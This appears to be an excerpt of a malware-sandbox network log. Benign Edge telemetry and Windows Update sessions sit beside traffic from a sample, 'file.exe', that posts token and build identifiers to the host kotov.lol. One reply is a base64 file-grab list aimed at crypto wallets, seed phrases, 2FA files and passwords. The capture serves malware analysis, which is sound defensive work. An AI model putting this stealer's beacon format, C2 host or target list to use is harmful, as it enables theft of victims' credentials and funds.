2024-11-29 11:28:13 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------DHDHCGHDHIDHCBGCBGCACont
2024-11-29 11:28:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:14 UTC	2364	IN	Data Raw: 39 33 30 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 930REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	49832	13.69.116.108	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:15 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732879692293&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11551 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-29 11:28:15 UTC	11551	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 39 54 31 31 3a 32 38 3a 31 32 2e 32 39 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 34 62 34 39 64 38 30 2d 33 32 38 66 2d 34 37 34 39 2d 39 32 63 34 2d 32 36 38 34 31 61 39 33 31 32 36 30 22 2c 22 65 70 6f 63 68 22 3a 22 31 32 32 34 32 34 31 36 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-29T11:28:12.291Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"d4b49d80-328f-4749-92c4-26841a931260","epoch":"1224241665"},"app":{"locale
2024-11-29 11:28:15 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=de646c245a264c5fad0c17bc88322956&HASH=de64&LV=202411&V=4&LU=1732879695404; Domain=.microsoft.com; Expires=Sat, 29 Nov 2025 11:28:15 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=8d84829e45a3497a97371f825ba8e771; Domain=.microsoft.com; Expires=Fri, 29 Nov 2024 11:58:15 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3111 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 29 Nov 2024 11:28:15 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	49833	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:15 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ollo6842okoMZC9&MD=Sx6+nVES HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-29 11:28:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 86991275-5ed8-4d17-8b44-0f075a48cbb4 MS-RequestId: 01c22301-fb83-445c-976f-171eaa5dae21 MS-CV: XeYBpbZ0fk6KZTFD.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 29 Nov 2024 11:28:14 GMT Connection: close Content-Length: 30005
2024-11-29 11:28:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-29 11:28:16 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	49831	13.69.116.108	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:15 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732879692299&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5052 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-29 11:28:15 UTC	5052	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 39 54 31 31 3a 32 38 3a 31 32 2e 32 39 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 34 62 34 39 64 38 30 2d 33 32 38 66 2d 34 37 34 39 2d 39 32 63 34 2d 32 36 38 34 31 61 39 33 31 32 36 30 22 2c 22 65 70 6f 63 68 22 3a 22 31 32 32 34 32 34 31 36 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-29T11:28:12.297Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"d4b49d80-328f-4749-92c4-26841a931260","epoch":"1224241665"},"app":{"locale
2024-11-29 11:28:15 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=353b197b7f4b441c96a8b7fdc091f6f9&HASH=353b&LV=202411&V=4&LU=1732879695445; Domain=.microsoft.com; Expires=Sat, 29 Nov 2025 11:28:15 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=b61d12edadfc4e208e526b4cac599714; Domain=.microsoft.com; Expires=Fri, 29 Nov 2024 11:58:15 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3146 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 29 Nov 2024 11:28:14 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	49834	13.69.116.108	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:16 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732879693223&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5250 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; msnup=
2024-11-29 11:28:16 UTC	5250	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 39 54 31 31 3a 32 38 3a 31 33 2e 32 32 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 34 62 34 39 64 38 30 2d 33 32 38 66 2d 34 37 34 39 2d 39 32 63 34 2d 32 36 38 34 31 61 39 33 31 32 36 30 22 2c 22 65 70 6f 63 68 22 3a 22 31 32 32 34 32 34 31 36 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-29T11:28:13.221Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"d4b49d80-328f-4749-92c4-26841a931260","epoch":"1224241665"},"app":{"locale
2024-11-29 11:28:16 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=02283d88d6754ad3bbbd621135aa2ade&HASH=0228&LV=202411&V=4&LU=1732879696260; Domain=.microsoft.com; Expires=Sat, 29 Nov 2025 11:28:16 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=900d579fa8974a57af22f848e5aa22d4; Domain=.microsoft.com; Expires=Fri, 29 Nov 2024 11:58:16 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3021 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 29 Nov 2024 11:28:15 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	49836	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:16 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:16 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------HJJJDAEGIDHCBFHJJJEGCont
2024-11-29 11:28:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	49835	13.69.116.108	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:16 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732879693298&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9523 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; msnup=
2024-11-29 11:28:16 UTC	9523	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 39 54 31 31 3a 32 38 3a 31 33 2e 32 39 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 34 62 34 39 64 38 30 2d 33 32 38 66 2d 34 37 34 39 2d 39 32 63 34 2d 32 36 38 34 31 61 39 33 31 32 36 30 22 2c 22 65 70 6f 63 68 22 3a 22 31 32 32 34 32 34 31 36 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-29T11:28:13.298Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"d4b49d80-328f-4749-92c4-26841a931260","epoch":"1224241665"},"app":{"loc
2024-11-29 11:28:16 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=7f1ccdd6c7aa450ca334ba0ebb3fd365&HASH=7f1c&LV=202411&V=4&LU=1732879696335; Domain=.microsoft.com; Expires=Sat, 29 Nov 2025 11:28:16 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=c7518dd67cfd42918c640bfd99882760; Domain=.microsoft.com; Expires=Fri, 29 Nov 2024 11:58:16 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3037 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 29 Nov 2024 11:28:15 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	49838	23.219.161.135	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:18 UTC	618	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733484478&P2=404&P3=2&P4=g4o8az3cVEuio76DbwsVVZ7ibW0x%2fl4QMZmewGefgJnemsosb31FdH%2fSZ0hpoZL3Zx5ucJpTHDSxAK79Rzs%2fkg%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: /UyMBl3yliqo/UW+eahdDC Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:19 UTC	1247	IN	HTTP/1.1 200 OK Content-Type: application/x-chrome-extension Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT Accept-Ranges: bytes ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.3 MS-CorrelationId: f6f8477c-5edc-49a4-b21e-7965443c7a7e MS-RequestId: df08b51f-9907-4feb-a5d8-2679ca5bb9c8 MS-CV: RfLr7ZZfpSXCyARt4VNCgU.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Cache-Control: public, max-age=86394 Date: Fri, 29 Nov 2024 11:28:19 GMT Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43" Connection: close Akamai-Request-BC: [a=23.35.17.151,b=255762904,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_SECAUCUS,o=20940] MSREGION: X-CCC: X-CID: 3 Akamai-GRN: 0.97112317.1732879699.f3ea1d8 Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Origin: *
